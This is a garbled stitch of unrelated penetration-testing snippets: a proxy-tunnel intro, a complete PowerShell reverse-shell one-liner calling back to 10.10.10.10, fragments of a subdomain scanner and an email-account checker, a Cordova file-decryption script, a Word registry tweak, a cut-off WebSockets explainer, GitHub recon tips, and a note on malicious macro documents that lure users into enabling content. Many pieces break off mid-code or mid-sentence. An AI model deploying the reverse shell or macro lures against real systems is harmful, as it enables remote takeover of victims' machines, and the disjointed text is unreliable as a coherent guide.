A combination of my own methodology and the Web Application Hacker's Handbook task checklist, as a GitHub-Flavored Markdown file
Sometimes it is useful to route traffic through a different machine for testing or development. At work, we have a VPN to a remote facility that we haven't bothered to fix for routing, so the only way to access a certain machine over that VPN is via an SSH tunnel to a machine that is reachable over the VPN. Other times, I have used this technique to test internet-facing requests against sites I am developing. It is pretty easy, and if you don't use Firefox regularly, you can treat Firefox as your "proxy" browser while other browsers keep a normal configuration (although you can also configure an entire system to use the proxy; other articles exist that discuss this option).
- Open a terminal
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#!/bin/bash
# Usage : ./scanio.sh <save file>
# Example: ./scanio.sh cname_list.txt
# Premium
# Prints a rotating spinner in front of the message passed as $1
# (intended to be run in the background while a longer task executes)
function ech() {
    spinner=( "|" "/" "-" "\\" )
    while true; do
        for i in "${spinner[@]}"; do
            echo -ne "\r[$i] $1"
            sleep 0.1   # frame interval; assumed, the original fragment ends at the echo above
        done
    done
}
#!/bin/bash
# PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created
# Use Chrome's Network tab to view the URL that makes this type of request.
# This is just a PoC; you can add in other email services along with other domains the current ones provide.
# URLs have been working all night, but might need to be updated in the future.
#
# Usage: ./account_checker.sh <email_list>
function google() {
    # Post data
// Blogpost: https://rz.my/2017/11/decrypting-cordova-crypt-file-plugin.html
var fs = require("fs"),
    path = require("path"),
    crypto = require("crypto");
// Key and IV as embedded by the cordova-plugin-crypt-file build step
var config = {
    key : 'CRYPT_KEY',
    iv : 'CRYPT_IV'
};
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
WebSockets is a modern HTML5 standard which makes communication between client and server much simpler than before. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time, but communication from the browser has usually been restricted. The general restrictions were:
- The server had a permanent listener, while the client (the browser) was not given any fixed listener for a longer-term connection. Hence, every exchange was restricted to the client requesting and the server responding.
- This meant that unless the client requested a particular resource, the server was unable to push that resource to the client.
- This was detrimental since the client is then forced to check with the server at regular intervals. This meant a lot of libraries focused on optimizing asynchronous calls and identifying the response of asynchronous calls. Notably t
GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. In this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output
This is a note for myself describing various Visual Basic macro construction strategies that could be used for remote code execution via a malicious document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glance before setting a payload.
All of the examples below were generated using 192.168.56.101 as the remote address.
List:
- Page substitution macro for luring the user into clicking Enable Content
- The Unicorn PowerShell-based payload